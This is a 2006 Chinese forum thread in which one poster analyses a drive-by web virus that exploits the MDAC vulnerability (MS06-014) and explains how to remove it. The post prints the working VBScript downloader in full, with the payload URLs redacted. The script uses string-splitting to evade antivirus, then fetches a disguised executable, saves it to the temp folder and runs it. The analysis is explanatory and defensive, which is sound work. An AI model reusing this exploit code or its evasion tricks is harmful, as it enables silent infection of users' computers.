pikoko wrote:
2006/09/09...(恕刪)
這幾天有人去過意欲了嗎
不知道現在去還會不會中= =
個人積分:4分
文章編號:1657651
個人積分:64分
文章編號:1657669
個人積分:4分
文章編號:1657757
個人積分:14分
文章編號:1657861
個人積分:446分
文章編號:1657981
個人積分:0分
文章編號:1657997
個人積分:6分
文章編號:1660218
個人積分:1分
文章編號:1660423
個人積分:0分
文章編號:1660890
以下是我的心得
此病毒連卡巴都掃不到!!!
只要開了有病毒程式的網頁就會中毒
一、病毒如何入侵
利用 XMLHttp , ADODB.Stream 的漏洞!
敝人將它分為3部分:
1.網頁病毒部份:以JavaScript寫成
將跳出一個視窗,上面號稱是贊助網頁,其中隱藏一個iframe,連結至
http://www.j*******.com/script/adcount.do?sn=ad001 網頁
(網址已作處理)
這裡已將iframe部分的語法做了加密,因此防毒程式無法掃到!
2.下載病毒與寫入硬碟部分:以VBScript寫成
沒興趣的人請跳過
注意:本程式碼僅供學術用途,請勿用此進行任何違法行為!
(請看程式碼)
on error resume next
'發生錯誤請繼續
clID1 = "clsi"
clID2 = "d:BD96C5"&"56-65A3-1"&"1D0-983A"&"-00C04FC29E36"
XML1 = "Mic"
XML2 = "rosoft.XMLHTTP"
AdoSqa1 = "Adodb.S"
AdoSqa2 = "tream"
'常見的"防"防毒程式偵測的方法
'例如有些論壇會將髒話字詞作過濾, 像 "fxxk"
'但是常有人在每個字母前後都空一格,這樣就不會被偵測到, 例: "f x x k"
oGet = "GET"
fname1 = "09a51.com"
'寫入的檔名
SFO = "Scr"&"ipti"&"ng.FileS"&"ystemObject"
SApp = "She"&"ll.Ap"&"plic"&"ation"
'跟前面一樣, 如法炮製
dl = "http://www.s******.com/script/src/ad001.gif"
'(網址已作處理)
Set df = document.createElement("object")
df.setAttribute "classid", clID1&clID2
'以classid建立物件
'於谷歌搜尋後
'此物件為 Microsoft Data Access Components (MDAC)
'MS有安全性更新, 附於後方
Set x = df.CreateObject(XML1&XML2,"")
set S = df.createobject(AdoSqa1&AdoSqa2,"")
'用剛建立的物件再產生一個物件, 以逃避IE建立物件的權限問題
S.type = 1
x.Open oGet, dl, False
x.Send
'以非同步方式下載檔案
set F = df.createobject(SFO,"")
'建立 File System Object 物件(寫過asp的人應該不陌生吧)
set tmp = F.GetSpecialFolder(2)
'取得temp資料夾路徑
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
'寫入病毒程式
S.savetofile fname1,2
S.close
set Q = df.createobject(SApp,"")
'產生 Shell.Application 物件
Q.ShellExecute fname1,"","","open",0
'執行病毒= =++
3.真實病毒部份
(會讓你的cpu呈現100%的程式)
由於敝人沒辦法去反譯此程式, 所以無法知道他破壞電腦裡的什麼東西.
二、病毒如何 Auto Update
敝人只想到以下三點
1. 病毒侵入電腦後,自動從網路上下載
2. 將 adcount.do 的內容更改以下載新的病毒檔
3. 更變 ad001.gif 的內容
三、病毒在還沒擴散前如何刪除
我也中過這支病毒
沒想到今天還有幸再遇到一次(應該不能說是有幸吧)
首先,當你發現cpu維持再100%頻頻lag時,
而且並沒有執行任何"燒機"程式
馬上按下reset鍵
重新開機
進入安全模式
並且去
drive:\Documents And Settings\user\Local Settings\Temp\
(drive為安裝windows的磁碟機,user為你的使用者名稱)
找找看有沒有可疑的檔
通常檔名為
*.com ; (數字).exe ; ad001.exe ;
(請參考前面大大的解毒方法裡有寫)
全部刪掉
並在找找看有沒有一個叫 VCab.dll 的檔,也刪掉
再來先用防毒軟體掃一次,還有沒有其他病毒存在
(因為聽說病毒會自動去下載其他病毒來執行)
*關於如何解決已感染病毒的檔案,請參考前面大大的文章
四、MS的安全性更新
剛剛在搜尋classid時,進到一個微軟的網頁:
Microsoft 安全性公告 MS06-014
Microsoft Data Access Components (MDAC) 函式中的弱點可能會允許執行程式碼 (911562)
打了好久
如有錯誤請指正,謝謝!
個人積分:64分
文章編號:1661976
